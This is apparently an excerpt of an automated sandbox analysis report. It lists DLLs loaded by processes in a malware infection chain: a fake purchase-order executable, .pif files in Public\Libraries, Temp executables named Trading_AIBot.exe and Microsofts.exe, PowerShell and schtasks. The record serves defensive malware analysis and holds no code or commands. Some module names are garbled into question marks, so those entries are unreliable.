                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ??l.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ?.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ?.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ??l.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ????.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ???e???????????.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ???e???????????.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ?.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ?.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ?.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ?.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ??l.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: ??l.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: tquery.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: cryptdll.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: spp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: vssapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: vsstrace.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: spp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: vssapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: vsstrace.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: mssip32.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: endpointdlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: endpointdlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: endpointdlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: endpointdlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: advapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: advapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: advapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: advapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: advapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: advapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: advapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: spp.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: vssapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: vsstrace.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppwmi.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppcext.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: winscard.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: devobj.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: edgegdi.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: version.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: slc.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: edgegdi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: edgegdi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Section loaded: dpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                          Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: edgegdi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: apphelp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: version.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: edgegdi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: uxtheme.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: url.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ieframe.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: iertutil.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: netapi32.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: userenv.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: winhttp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: wkscli.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: netutils.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: amsi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: smartscreenps.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: winmm.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: wininet.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sspicli.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: windows.storage.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: wldp.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: profapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: mswsock.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ieproxy.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: iphlpapi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: winnsi.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ieproxy.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ieproxy.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: mssip32.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: mssip32.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: mssip32.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ??????????.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ??.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ???.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ???.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ???.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ??l.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ??l.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ?.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ?.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ??l.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ????.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ???e???????????.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ???e???????????.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ?.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ?.dll
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ?.dll
